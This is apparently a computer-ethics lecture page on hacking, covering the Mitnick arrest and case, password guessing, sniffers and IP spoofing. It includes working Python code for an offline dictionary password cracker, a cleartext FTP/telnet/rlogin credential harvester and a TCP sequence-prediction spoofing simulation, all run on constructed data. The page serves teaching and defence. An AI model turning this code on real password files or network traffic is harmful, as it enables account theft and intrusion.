Week 10: "Hacking"

The arrest of Kevin Mitnick. Late at night on Valentine's Day 1995, at the Players' Club Apartments off of Duraleigh Road in Raleigh, the famous "hacker" Kevin Mitnick was arrested. He had moved to Raleigh the preceding January 4th. A couple of months earlier he had disappeared from Seattle when his landlord told him that the police and Secret Service were looking for him. Mitnick said, "They have made me out to be John Dillinger or a desperado, but I'm just an excellent prankster. I have never profited from it."

Mitnick was captured largely due to the efforts of Tsutomu Shimomura, a security expert from the San Diego Supercomputing Center. Shimomura said, "I knew one thing for certain about Kevin Mitnick: He was in no way the hero of a movie about some mistreated computer hacker whose only crime was curiosity. There was nothing heroic about reading other people's e-mail and stealing their software."

Means of penetration. The word "hacker" originally meant a programmer who was adept at using the tricks of the trade. Largely because of confusion in the news media, it came to mean someone who breaks into computer systems. One common but low-tech means of penetration is guessing passwords, as the Internet worm did in 1988: it tried each account's login name and simple variations of it, then a built-in word list, then the system dictionary, against a copy of the password file. Another is a rogue login program, a user-level program that displays a screen that looks exactly like the operating system's login screen. When an unsuspecting user logs in, the program records the user-ID and password for the hacker and then logs the user in normally, so that nothing looks amiss.
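To make the password guessing concrete, here is an added example (not code from the course notes or from the worm itself) of an offline attack against a world-readable password file in the 1988 worm's style. The users, passwords, salts and the short word list are constructed for this example, and a salted SHA-256 stands in for the crypt(3) DES hash of the period; the attacker's procedure is the same with either hash.

```python
import hashlib

def hash_password(salt, password):
    """Salted hash stored the way crypt(3) stores it: salt in the clear in front
    of the digest, so anyone holding the file can recompute guesses against it.
    SHA-256 stands in here for the DES crypt of 1988; the attack is identical."""
    return salt + "$" + hashlib.sha256((salt + password).encode()).hexdigest()

def passwd_entry(name, uid, gecos, password, salt):
    """One line in the classic world-readable /etc/passwd layout."""
    return f"{name}:{hash_password(salt, password)}:{uid}:{uid}:{gecos}:/home/{name}:/bin/sh"

# Constructed sample file: users, passwords and salts invented for this example.
SAMPLE_PASSWD = "\n".join([
    passwd_entry("alice", 1001, "Alice Liddell", "alice", "ab"),      # password is the login name
    passwd_entry("bob", 1002, "Bob Cratchit", "tihctarc", "cd"),      # surname spelled backwards
    passwd_entry("carol", 1003, "Carol Danvers", "wombat", "ef"),     # plain dictionary word
    passwd_entry("dave", 1004, "Dave Bowman", "Tr0ub4dor&3", "gh"),   # not guessable this way
])

# Small stand-in for the worm's built-in list of a few hundred likely words.
WORDLIST = ["aaa", "academia", "beater", "cookie", "password", "wizard", "wombat"]

def candidates(name, gecos, wordlist):
    """Guesses in roughly the order the 1988 worm tried them: no password, the
    login name and trivial variations, words from the GECOS (full name) field
    forwards and backwards, then the word list."""
    yield ""
    yield name
    yield name + name
    yield name[::-1]
    for word in gecos.replace(",", " ").lower().split():
        yield word
        yield word[::-1]
    yield from wordlist

def guess_passwords(passwd_text, wordlist=WORDLIST):
    """Offline dictionary attack. Returns {login: recovered password}. Nothing
    is sent to the system; a copy of the password file is all it needs."""
    cracked = {}
    for line in passwd_text.splitlines():
        name, stored, _uid, _gid, gecos, _home, _shell = line.split(":")
        salt = stored.split("$", 1)[0]
        for guess in candidates(name, gecos, wordlist):
            if hash_password(salt, guess) == stored:
                cracked[name] = guess
                break
    return cracked

if __name__ == "__main__":
    for user, password in guess_passwords(SAMPLE_PASSWD).items():
        print(f"{user}: {password!r}")
```

Three of the four accounts fall to a few dozen guesses each, and the attacker never touches the target system while guessing, which is why a readable password file (and, later, Netcom's subscriber file) was worth stealing. The fourth account survives only because its password is in none of the candidate sets; shadow password files and slow, salted hashes are the defenses that make this attack expensive.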

Sniffers. Then, about 1993, so-called "sniffers" came into prominence on the Internet. First, the intruder breaks into a single system on a network. Then (s)he installs a program that puts the network interface into promiscuous mode and watches the traffic for certain kinds of packets: the first part of each telnet, ftp, or rlogin session, where the username and password cross the wire in the clear. It reports those usernames and passwords back to the intruder. Some of the sessions may be logins to distant networks, so one weak machine anywhere can compromise accounts all over the Internet. In February 1994, a rapid increase in sniffer incidents led the CERT Coordination Center to issue an advisory. On NCSU Eos and Unity systems, Kerberos doesn't send passwords over the network, and everything it sends to authorize access is encrypted. Even if a Kerberos session key were cracked, it expires within hours, along with the user's tickets and tokens.
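What a sniffer actually extracts can be seen in this added example (not code from the course notes or from any real sniffer), which takes a few constructed ftp, telnet and rlogin sessions, invented for this page, and pulls out the usernames and passwords those protocols send in the clear. The sessions, host names and credentials are made up; the protocol details it relies on (FTP's USER/PASS commands, telnet's IAC option bytes, rlogin's opening header) are real.

```python
import re

IAC, SB, SE = 0xFF, 0xFA, 0xF0                      # telnet command bytes
LINE_END = re.compile(rb"\r\n|\r\x00|\r|\n")        # line endings seen in terminal traffic

def strip_telnet_options(data):
    """Drop telnet option negotiation (IAC sequences) so only typed text remains."""
    out, i = bytearray(), 0
    while i < len(data):
        nxt = data[i + 1] if i + 1 < len(data) else None
        if data[i] != IAC:
            out.append(data[i]); i += 1
        elif nxt == IAC:                                 # escaped 0xFF data byte
            out.append(IAC); i += 2
        elif nxt == SB:                                  # subnegotiation runs to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif nxt is not None and 0xFB <= nxt <= 0xFE:    # WILL/WONT/DO/DONT + option
            i += 3
        else:                                            # any other two-byte command
            i += 2
    return bytes(out)

def harvest_ftp(packets):
    """FTP logs in with literal USER and PASS commands, one per line."""
    client = b"".join(p for d, p in packets if d == "c2s")
    creds, user = [], None
    for line in client.split(b"\r\n"):
        m = re.match(rb"(?i)(USER|PASS) (.*)", line)
        if not m:
            continue
        if m.group(1).upper() == b"USER":
            user = m.group(2).decode(errors="replace")
        elif user is not None:
            creds.append(("ftp", user, m.group(2).decode(errors="replace")))
            user = None
    return creds

def harvest_telnet(packets):
    """Telnet has no login command: pair each server prompt with the next line
    the client types. The server's echo of the name carries no prompt, so it is
    ignored; the password is never echoed."""
    creds, fields, pending, buf = [], {}, None, b""
    for direction, payload in packets:
        text = strip_telnet_options(payload)
        if direction == "s2c":
            low = text.lower()
            if b"login:" in low or b"username:" in low:
                pending = "user"
            elif b"password:" in low:
                pending = "pass"
            continue
        buf += text
        while (m := LINE_END.search(buf)) is not None:
            line, buf = buf[:m.start()], buf[m.end():]
            if pending:
                fields[pending], pending = line.decode(errors="replace"), None
            if "user" in fields and "pass" in fields:
                creds.append(("telnet", fields.pop("user"), fields.pop("pass")))
    return creds

def harvest_rlogin(packets):
    """rlogin opens with \\0local\\0remote\\0term/speed\\0 from the client; a
    password follows only when .rhosts trust does not already let the user in."""
    creds, remote, want_pass = [], None, False
    for direction, payload in packets:
        if direction == "c2s" and remote is None:
            parts = payload.split(b"\0")
            if len(parts) >= 4:
                remote = parts[2].decode(errors="replace")
        elif direction == "s2c" and b"password:" in payload.lower():
            want_pass = True
        elif direction == "c2s" and want_pass:
            password = LINE_END.split(payload)[0].decode(errors="replace")
            creds.append(("rlogin", remote, password))
            want_pass = False
    return creds

HANDLERS = {21: harvest_ftp, 23: harvest_telnet, 513: harvest_rlogin}

def harvest(dst_port, packets):
    """Run the right extractor over one reassembled session, given as a list of
    (direction, payload) pairs with direction "c2s" or "s2c"."""
    handler = HANDLERS.get(dst_port)
    return handler(packets) if handler else []

# Constructed sessions standing in for what a sniffer would reassemble.
FTP_SESSION = [
    ("s2c", b"220 host.example.edu FTP server ready.\r\n"),
    ("c2s", b"USER alice\r\n"),
    ("s2c", b"331 Password required for alice.\r\n"),
    ("c2s", b"PASS wonderland\r\n"),
    ("s2c", b"230 User alice logged in.\r\n"),
]
TELNET_SESSION = [
    ("s2c", b"\xff\xfd\x18\xff\xfd\x22host.example.edu login: "),
    ("c2s", b"\xff\xfc\x18bob\r\n"),
    ("s2c", b"bob\r\nPassword: "),
    ("c2s", b"cratchit\r\n"),
]
RLOGIN_SESSION = [
    ("c2s", b"\x00bob\x00root\x00vt100/9600\x00"),
    ("s2c", b"\x00Password:"),
    ("c2s", b"toor\r"),
]
```

Running `harvest(21, FTP_SESSION)`, `harvest(23, TELNET_SESSION)` and `harvest(513, RLOGIN_SESSION)` yields one (protocol, user, password) triple each. Nothing about the capture is clever; the credentials are simply there in the first few packets, which is why a sniffer needs only a few kilobytes per session and why Kerberos, which never puts the password on the wire, defeats it.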

IP spoofing. Another ruse is IP spoofing. Robert Morris wrote the first paper on this weakness as an intern at Bell Labs in 1984. The attack exploits hosts that trust connections from a particular machine (here, a fileserver) on the basis of its IP address alone. To start out, a large number of connection requests (SYNs) are sent to the fileserver, filling its queue of half-open connections so that it cannot respond, and in particular cannot reset, the connection the intruder is about to forge in its name. Then the intruder sends a series of connection requests to the target computer from his own address, to learn how it generates TCP initial sequence numbers; if each new connection's number is a fixed increment from the last, the next one can be predicted. He next sends a SYN to the target forged to appear to come from the fileserver. The target's reply goes to the silenced fileserver, so the intruder never sees it, but he completes the handshake blind by sending an ACK carrying the predicted sequence number. In this way the intruder masquerades as the fileserver and can execute commands on the target computer, for example over a service like rsh that trusts the source address.
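The sequence-number step of the attack is easiest to see in a simulation. The following added example (not from the course notes or from Morris's paper) models a server that hands out initial sequence numbers either from a constant-increment counter, in the spirit of the 4.2BSD stack, or at random, and an intruder who probes it, predicts the next number and completes the handshake blind while claiming the trusted host's address. The addresses and the increment of 128,000 are assumed for illustration; the SYN flood that silences the trusted host in step 1 is not modelled.

```python
import secrets

MASK = 0xFFFFFFFF   # TCP sequence numbers are 32-bit and wrap

class TcpServer:
    """Just the part of a TCP listener this attack depends on: how it chooses
    the initial sequence number (ISN) it puts in each SYN-ACK, and the rule
    that an ACK completes the handshake only if it acknowledges exactly ISN+1."""
    def __init__(self, isn_generator):
        self.next_isn = isn_generator
        self.half_open = {}           # claimed client address -> ISN we sent it

    def recv_syn(self, src):
        """Answer a SYN. The SYN-ACK (with the ISN inside) goes to src, which is
        whatever address the SYN claimed, not necessarily the real sender."""
        isn = self.next_isn()
        self.half_open[src] = isn
        return isn

    def recv_ack(self, src, ack_number):
        isn = self.half_open.pop(src, None)
        return isn is not None and ack_number == (isn + 1) & MASK

def counter_isn(increment=128_000, start=0x1000):
    """Deliberately weak: a counter advanced by a constant per connection (the
    increment is an assumed value), so a few samples give away all future ISNs."""
    state = [start]
    def gen():
        state[0] = (state[0] + increment) & MASK
        return state[0]
    return gen

def random_isn():
    """The fix: an ISN an outsider cannot infer from earlier connections."""
    return lambda: secrets.randbits(32)

def blind_spoof(server, trusted="10.0.0.2", attacker="192.0.2.66", probes=3):
    """Complete a handshake with `server` while claiming to be `trusted`.
    Step 1 of the real attack, flooding `trusted` with SYNs so it cannot
    reset the forged connection, is assumed to have happened already."""
    # Step 2: connect from the attacker's own address a few times; those
    # SYN-ACKs do reach the attacker, so they reveal how the ISN moves.
    samples = [server.recv_syn(attacker) for _ in range(probes)]
    server.half_open.pop(attacker, None)        # attacker resets its own probes
    steps = {(b - a) & MASK for a, b in zip(samples, samples[1:])}
    if len(steps) != 1:                         # no constant step: nothing to predict
        return False
    predicted = (samples[-1] + steps.pop()) & MASK
    # Step 3: SYN forged with trusted's address. The SYN-ACK goes to trusted,
    # which is silenced, so the attacker never sees this value.
    server.recv_syn(trusted)
    # Step 4: ACK sent blind, acknowledging the guessed ISN. If it matches, the
    # server believes trusted opened this connection, and address-based trust
    # (rsh, .rhosts) does the rest.
    return server.recv_ack(trusted, (predicted + 1) & MASK)

def success_rate(make_generator, trials=50):
    """Fraction of fresh servers against which the blind spoof is accepted."""
    wins = sum(blind_spoof(TcpServer(make_generator())) for _ in range(trials))
    return wins / trials

if __name__ == "__main__":
    print("predictable ISN:", success_rate(counter_isn))
    print("random ISN:     ", success_rate(random_isn))
```

Against the counter the spoof succeeds every time with three probes; against unpredictable ISNs the probe differences disagree and the attacker has a one-in-four-billion guess. Note that the attacker sees none of the target's replies throughout steps 3 and 4, which is why predictability of the ISN, not any secret, is the whole security of address-based trust.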

Justifications for hacking. Some hackers contend that information should be free, and if it were free, there would be no need for intellectual property and security. Suppose that were true--an economist would say that by decreeing the price of information to be 0, you minimize the supply.

Others say that break-ins illustrate security problems and cause them to be fixed. For example, in 1984, Steven Gold and Robert Schifreen penetrated British Telecom's Prestel system and left a rude message in the Duke of Edinburgh's account. The incident attracted enormous publicity and led directly to improved security for the Prestel system. They were convicted under the Forgery Act and fined £2350, but they won on appeal: the Forgery Act did not cover what they had done, and they had caused no damage and defrauded no one. Now break-ins are a crime in Britain, thanks to the Computer Misuse Act 1990. But what of this argument? If the hackers wanted the security problems fixed, why don't they report them so they can be fixed immediately? This pro-hacker view is like saying that vigilantes who tried to break into houses would be doing a neighborhood a service. Hackers do cause security modifications to be made, but at an expense that would not be necessary if they didn't break in. It's like car theft: if cars are being stolen frequently, locking them isn't good enough; you need burglar alarms, and they cost extra money. There are other ways to expose security flaws, "tiger teams" (authorized penetration testers), for example.

A third perspective is that hackers are doing no harm; they are just learning how computer systems operate. But it is hard to be sure they're not causing trouble. Even slowing down a system slightly could be critical in some cases: suppose the computer is being used to match organ donors with recipients and it fails to find a match soon enough. Unauthorized access is also an invasion of privacy. Certainly the military would prosecute any unauthorized access, even if it were only to a computer keeping track of laundry. Unfortunately, in computer systems it is easy to damage something unintentionally, but hard to establish intent. At the very least, hackers undermine the trust that is essential for a "neighborhood" to operate smoothly. There are better ways to learn about computing.

Some hackers say they break into systems to watch for abuses and hold "Big Brother" at bay. Now that e-commerce is becoming important to large corporations, hacking is also being undertaken for political motives. An example is the September 2000 attack on 168 Web sites to protest high fuel taxes in the UK. Regardless of whether the abuses these hackers target are imagined or real, there are probably better protections than free-lance vigilantes.

The Kevin Mitnick case. Mitnick's downfall began with a Christmas-Day 1994 attack on Shimomura's computers. An intruder became root on a SPARCstation in a renovated San Francisco house where Shimomura was staying, and used this computer to launch an attack on computers in Shimomura's beach house in San Diego. Shimomura, a computer-security expert at the San Diego Supercomputing Center, collected information on little-known vulnerabilities in operating systems and kept a variety of security tools on his computers; not all of those computers were on the Internet, but some were. The attack was discovered when one of Shimomura's assistants, ECE student Andrew Gross, noticed Shimomura's log files getting shorter. That is a sign that someone is erasing records from log files to cover his tracks. By looking at the file structure on his gateway computer, Shimomura discovered that a file called oki.tar.Z had momentarily existed. He thought that might have something to do with the Oki cellular-phone software he had once reverse-engineered for a programmer who was developing field-diagnostic software to sell to telephone companies and law-enforcement agencies.

Shimomura was born in 1964 in Nagoya, Japan. His father was a biochemist and his mother a pharmacologist working on luminescence. His parents moved to Princeton University when he was very young. Tsutomu was interested in experimenting, but not in his classes. He got into an antiestablishment group at Princeton High School and was expelled for it, even though he had won a local math/science contest.

One of the intruder's modes of attack was IP spoofing, used to steal files from Shimomura's computer at SDSC. He copied these files to the Well, a northern California timesharing service, and made them publicly readable. It was the end of January 1995 when the Well realized it had been hacked. Shimomura, who was advising them, let them delete the files, but only after first sending the account a routine message saying that it was over quota, so that the deletion would look like housekeeping rather than tip the intruder off that the Well knew something was amiss. The files reappeared a week later under another account, an indication that the hacker had access to more than one Well account.

At first, Shimomura didn't think he was dealing with Mitnick; the attacks seemed too sophisticated. Later, using sniffers and filtering software, they captured some of his sessions and found that he searched for the string "itni" in the e-mail of New York Times reporter John Markoff. (Mitnick himself had tried sniffing, to see whether he would be vulnerable that way, but concluded it wouldn't work because there was too much traffic to sift. He didn't anticipate the filtering software that Shimomura et al. installed.) Shimomura was concerned that Mitnick would get spooked and disappear again; this was their second sting. Or what if he retaliated with a more sophisticated attack on the Internet?

Mitnick was using a Sprint cellular phone to connect to the Internet through Netcom's Raleigh dial-up number. (It was rare for someone to call an Internet service provider from a cellular phone unless he was stealing the service; it was too expensive and prone to disconnection.) Shimomura traveled to Raleigh and worked with the FBI and other police agencies to capture Mitnick. They rigged a van with radio direction-finding equipment, then put a box over the top of it so Mitnick wouldn't get suspicious if he happened to glance out. They staked out the Players' Club apartment complex off Duraleigh Rd., just south of Glenwood. It took them two days to get the necessary warrants; for example, they needed a special warrant to make an arrest after 10:00 at night. Meanwhile, back in California, Andrew Gross misinterpreted a communication from Shimomura to mean that Mitnick had already been captured, and started deleting the files Mitnick had stolen. This gave Shimomura a scare; he was afraid it would tip off Mitnick. Finally, at 1:40 AM on February 15, 1995, they arrested him. If you are interested in learning about the pursuit in more detail, visit the Web site of Shimomura's book Takedown, where you can listen to Mitnick's voicemail and replay some of his hacking attempts.

Mitnick's harm. What harm did Mitnick do? Well, he read other people's e-mail, especially computer-security researchers'. He stole the mail of Eric Allman, the author of sendmail, no doubt to find reports of new security problems with sendmail. He stole software indiscriminately, including a lot of free software. He pilfered cellular-phone software from Qualcomm, a San Diego technology firm. He got lots of programs from Intermetrics, an East Coast software house. From Silicon Graphics, he filched the 3-D workstation software used in creating most Hollywood movie special effects. He copped sundry software tools for breaking into computers in various ways. He stole 20,000 credit-card numbers from Netcom, an Internet access provider, but evidently never used any of them. He also got his hands on Netcom's subscriber password file, so that he could guess poor passwords offline, as the Morris worm did.

He caused serious concern at Internet access providers. The Well, especially, was home to a number of privacy activists who would be paranoid about anyone reading their mail. The Well wanted to close the security holes, but Shimomura persuaded them not to for a time, to avoid tipping off the intruder: "If you ... chang[e] passwords and clos[e] his accounts, he's almost certain to have hidden a Trojaned program somewhere ... that would allow him to come right back in, only this time you won't know where he is." He broke into computer systems at several academic, government, and commercial sites. He had root access at a number of them, so he could have destroyed files and accounting information. Even though he hadn't tried anything like that, who knew what he might try if he were on the verge of being caught? He eluded police for three years. He was almost captured at a Kinko's in 1992, when he had California driver records of law-enforcement officers faxed to him.

The penalty. Mitnick was indicted on 23 counts of computer and telecommunications fraud. Those were just the charges in North Carolina; they didn't include the charges he faced in California and a number of other states. In July 1995, he pled guilty to one charge of cellular-telephone fraud and was sentenced to eight months in prison; the other 22 counts were dropped as a result of a plea bargain. He was released from prison in January 2000.

Questions raised. The Mitnick case raises several questions. Should information on computer break-ins be more widely available? Shimomura says CERT describes break-ins too tersely to allow them to be reproduced, and it will never publicize the names of organizations that have suffered a break-in, saying that would discourage cooperation. A second question: how is Mitnick different from the "ordinary" hacker? Is Kevin Mitnick the forerunner of a more dangerous breed of "cracker"?

Finally, what should be done about hacking? A three-pronged approach is needed: revise existing laws to keep pace with technology; build and run more secure systems; and, lastly, sensitize individuals to ethical issues, as we are trying to do in this course.